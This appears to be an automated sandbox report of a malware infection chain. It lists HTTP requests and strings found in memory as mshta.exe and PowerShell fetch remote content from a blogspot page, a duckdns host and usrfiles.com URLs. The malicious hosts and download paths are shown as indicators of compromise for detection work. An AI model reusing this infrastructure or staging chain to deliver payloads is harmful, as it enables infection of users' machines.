Source: global traffic | HTTP traffic detected: GET /p/30.html HTTP/1.1 | Accept: */* | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: kdaoskdokaodkwldld.blogspot.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /static/v1/widgets/1529571102-css_bundle_v2.css HTTP/1.1 | Accept: */* | Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.html | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: www.blogger.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /static/v1/jsbin/403901366-ieretrofit.js HTTP/1.1 | Accept: */* | Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.html | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: www.blogger.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=3903609419317699398&zx=5f07c876-ed15-412f-a301-ebcedf46395e HTTP/1.1 | Accept: */* | Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.html | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: www.blogger.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /static/v1/widgets/1397508952-widgets.js HTTP/1.1 | Accept: */* | Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.html | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: www.blogger.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /blogin.g?blogspotURL=https://kdaoskdokaodkwldld.blogspot.com/p/30.html&type=blog HTTP/1.1 | Accept: */* | Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.html | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: www.blogger.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /ServiceLogin?passive=true&continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://kdaoskdokaodkwldld.blogspot.com/p/30.html%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://kdaoskdokaodkwldld.blogspot.com/p/30.html%26type%3Dblog%26bpli%3D1&go=true HTTP/1.1 | Accept: */* | Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.html | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: accounts.google.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fkdaoskdokaodkwldld.blogspot.com%2Fp%2F30.html&type=blog&bpli=1 HTTP/1.1 | Accept: */* | Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.html | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: www.blogger.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /blogblog/data/1kt/simple/body_gradient_tile_light.png HTTP/1.1 | Accept: */* | Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.html | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: resources.blogblog.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /blogblog/data/1kt/simple/gradients_light.png HTTP/1.1 | Accept: */* | Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.html | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: resources.blogblog.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /s1/30.txt HTTP/1.1 | Accept: */* | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: www.starinxxxgkular.duckdns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /images/branding/googlelogo/1x/googlelogo_color_150x54dp.png HTTP/1.1 | Accept: */* | Referer: http://www.starinxxxgkular.duckdns.org/s1/30.txt | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: www.google.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /images/errors/robot.png HTTP/1.1 | Accept: */* | Referer: http://www.starinxxxgkular.duckdns.org/s1/30.txt | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: www.google.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /s1/30.txt HTTP/1.1 | Accept: */* | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: www.starinxxxgkular.duckdns.org | Connection: Keep-Alive
Source: C:\Windows\System32\mshta.exe | DNS query: name: j.mp
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown | Network traffic detected: HTTP traffic on port 49183 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49184
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49183
Source: unknown | Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49176 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49174 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49178 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49184 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49179
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49178
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49177
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49176
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49175
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown | Network traffic detected: HTTP traffic on port 49175 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49177 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49179 -> 443
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1570Date: Thu, 25 Nov 2021 17:30:43 GMT
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1570Date: Thu, 25 Nov 2021 17:30:58 GMT
Source: mshta.exe, 00000010.00000003.484877129.0000000000295000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.496872387.0000000000295000.00000004.00000020.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.comN equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000005.00000003.439743604.000000000042B000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441070909.000000000042B000.00000004.00000020.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.coma equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000010.00000003.484411101.00000000056CC000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.501276074.00000000056CF000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmpString found in binary or memory: Content-Security-Policy: script-src 'self' *.google.com *.google-analytics.com 'unsafe-inline' 'unsafe-eval' *.gstatic.com *.googlesyndication.com *.blogger.com *.googleapis.com uds.googleusercontent.com https://s.ytimg.com https://i18n-cloud.appspot.com https://www.youtube.com www-onepick-opensocial.googleusercontent.com www-bloggervideo-opensocial.googleusercontent.com www-blogger-opensocial.googleusercontent.com https://www.blogblog.com; report-uri /cspreport equals www.youtube.com (Youtube)
Source: mshta.exe, 00000005.00000002.441801634.0000000004140000.00000002.00020000.sdmp, mshta.exe, 00000010.00000002.498911602.0000000003E20000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: mshta.exe, 00000010.00000002.498179973.000000000331E000.00000004.00000001.sdmpString found in binary or memory: pspot.com https://www.youtube.com www-onepick-opensocial.googleusercontent.com www-bloggervideo-opensocial.googleux"2 equals www.youtube.com (Youtube)
Source: mshta.exe, 00000005.00000003.439743604.000000000042B000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441070909.000000000042B000.00000004.00000020.sdmp, mshta.exe, 00000010.00000003.484877129.0000000000295000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.496872387.0000000000295000.00000004.00000020.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484877129.0000000000295000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.496872387.0000000000295000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.440300722.00000000039C0000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441540511.00000000039C0000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484877129.0000000000295000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495126051.0000000003344000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.496872387.0000000000295000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.439743604.000000000042B000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441070909.000000000042B000.00000004.00000020.sdmp, mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495126051.0000000003344000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495126051.0000000003344000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: mshta.exe, 00000010.00000003.483859380.0000000005642000.00000004.00000001.sdmpString found in binary or memory: http://csi.gstatic.com/csi
Source: mshta.exe, 00000005.00000002.441801634.0000000004140000.00000002.00020000.sdmp, mshta.exe, 00000010.00000002.498911602.0000000003E20000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
Source: mshta.exe, 00000005.00000002.441801634.0000000004140000.00000002.00020000.sdmp, mshta.exe, 00000010.00000002.498911602.0000000003E20000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
Source: mshta.exe, 00000005.00000002.442002599.0000000004327000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: mshta.exe, 00000005.00000002.442002599.0000000004327000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: mshta.exe, 00000005.00000003.440300722.00000000039C0000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441540511.00000000039C0000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495126051.0000000003344000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484877129.0000000000295000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495126051.0000000003344000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.496872387.0000000000295000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
Source: mshta.exe, 00000005.00000003.440300722.00000000039C0000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441540511.00000000039C0000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495126051.0000000003344000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.439743604.000000000042B000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441070909.000000000042B000.00000004.00000020.sdmp, mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495126051.0000000003344000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
Source: mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495159129.00000000033B6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.457364588.000000000565F000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/BlogPosting
Source: mshta.exe, 00000005.00000002.442223574.0000000004520000.00000002.00020000.sdmp, powershell.exe, 0000000B.00000002.453893933.0000000002390000.00000002.00020000.sdmp, taskeng.exe, 0000000F.00000002.672021301.0000000001BF0000.00000002.00020000.sdmp, mshta.exe, 00000010.00000002.499418426.0000000004200000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: mshta.exe, 00000005.00000002.442002599.0000000004327000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: mshta.exe, 00000005.00000002.442002599.0000000004327000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: mshta.exe, 00000005.00000002.442223574.0000000004520000.00000002.00020000.sdmp, powershell.exe, 0000000B.00000002.453893933.0000000002390000.00000002.00020000.sdmp, taskeng.exe, 0000000F.00000002.672021301.0000000001BF0000.00000002.00020000.sdmp, mshta.exe, 00000010.00000002.499418426.0000000004200000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495126051.0000000003344000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: mshta.exe, 00000005.00000002.441801634.0000000004140000.00000002.00020000.sdmp, mshta.exe, 00000010.00000002.498911602.0000000003E20000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: mshta.exe, 00000005.00000002.442002599.0000000004327000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: mshta.exe, 00000005.00000002.441801634.0000000004140000.00000002.00020000.sdmp, mshta.exe, 00000010.00000002.498911602.0000000003E20000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 0000000B.00000002.453588226.000000000032F000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
Source: mshta.exe, 00000005.00000003.430602975.00000000002DD000.00000004.00000001.sdmpString found in binary or memory: http://www.starinxxxgkular.duckdns.org/s1/30.txt
Source: mshta.exe, 00000010.00000002.498911602.0000000003E20000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
Source: mshta.exe, 00000005.00000003.439129933.0000000003A3E000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.439246961.0000000003A4C000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441627561.0000000003A52000.00000004.00000001.sdmpString found in binary or memory: https://8d3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4
Source: powershell.exe, 0000000B.00000002.457407160.0000000003016000.00000004.00000001.sdmpString found in binary or memory: https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfil
Source: powershell.exe, 0000000B.00000002.457407160.0000000003016000.00000004.00000001.sdmpString found in binary or memory: https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.c
Source: mshta.exe, 00000005.00000003.430608858.00000000002D2000.00000004.00000001.sdmpString found in binary or memory: https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.co4A
Source: powershell.exe, 0000000B.00000002.457407160.0000000003016000.00000004.00000001.sdmpString found in binary or memory: https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ug
Source: powershell.exe, 0000000B.00000002.457407160.0000000003016000.00000004.00000001.sdmpString found in binary or memory: https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8d
Source: powershell.exe, 0000000B.00000002.457407160.0000000003016000.00000004.00000001.sdmpString found in binary or memory: https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3
Source: powershell.exe, 0000000B.00000002.457407160.0000000003016000.00000004.00000001.sdmpString found in binary or memory: https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_4
Source: powershell.exe, 0000000B.00000002.457407160.0000000003016000.00000004.00000001.sdmpString found in binary or memory: https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_408b52dd81ad428db256ba35835b2ee
Source: powershell.exe, 0000000B.00000002.457407160.0000000003016000.00000004.00000001.sdmpString found in binary or memory: https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4d79aadce07d7856d8a
Source: mshta.exe, 00000010.00000003.484784407.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500538246.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.494969848.00000000055B9000.00000004.00000001.sdmpString found in binary or memory: https://accounts.google.com/
Source: mshta.exe, 00000010.00000003.495294389.000000000554A000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484623125.0000000005549000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500262076.000000000554A000.00000004.00000001.sdmpString found in binary or memory: https://accounts.google.com/.js
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500891130.0000000005619000.00000004.00000001.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?passive=true&continue=https://www.blogger.com/blogin.g?blog
Source: mshta.exe, 00000010.00000002.501168449.00000000056BB000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?service=blogger&continue=https://www.blogger.com/blogge
Source: mshta.exe, 00000010.00000003.484784407.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500538246.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.494969848.00000000055B9000.00000004.00000001.sdmpString found in binary or memory: https://accounts.google.com/div
Source: mshta.exe, 00000010.00000003.484784407.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500538246.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.494969848.00000000055B9000.00000004.00000001.sdmpString found in binary or memory: https://accounts.google.com/ogspot.
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmpString found in binary or memory: https://ads.google.com/home/?subid=ww-ww-et-g-aw-a-vasquette_ads_cons_1
Source: mshta.exe, 00000010.00000003.484411101.00000000056CC000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmpString found in binary or memory: https://apis.google.com
Source: mshta.exe, 00000010.00000003.495222019.00000000055E5000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484384718.00000000055E1000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.483617923.0000000005AE5000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.485867310.0000000002AB0000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484511448.00000000033A7000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.483590836.0000000005AEB000.00000004.00000001.sdmpString found in binary or memory: https://apis.google.com/js/plusone.js
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmpString found in binary or memory: https://artsandculture.google.com/?hl=de&utm_source=ogs.google.com&utm_medium=referral
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmpString found in binary or memory: https://books.google.co.uk/?hl=de&tab=jp
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmpString found in binary or memory: https://calendar.google.com/calendar?tab=jc
Source: mshta.exe, 00000010.00000003.483859380.0000000005642000.00000004.00000001.sdmpString found in binary or memory: https://csi.gstatic.com/csi
Source: mshta.exe, 00000010.00000002.498179973.000000000331E000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484877129.0000000000295000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.496872387.0000000000295000.00000004.00000020.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/blogger-tech
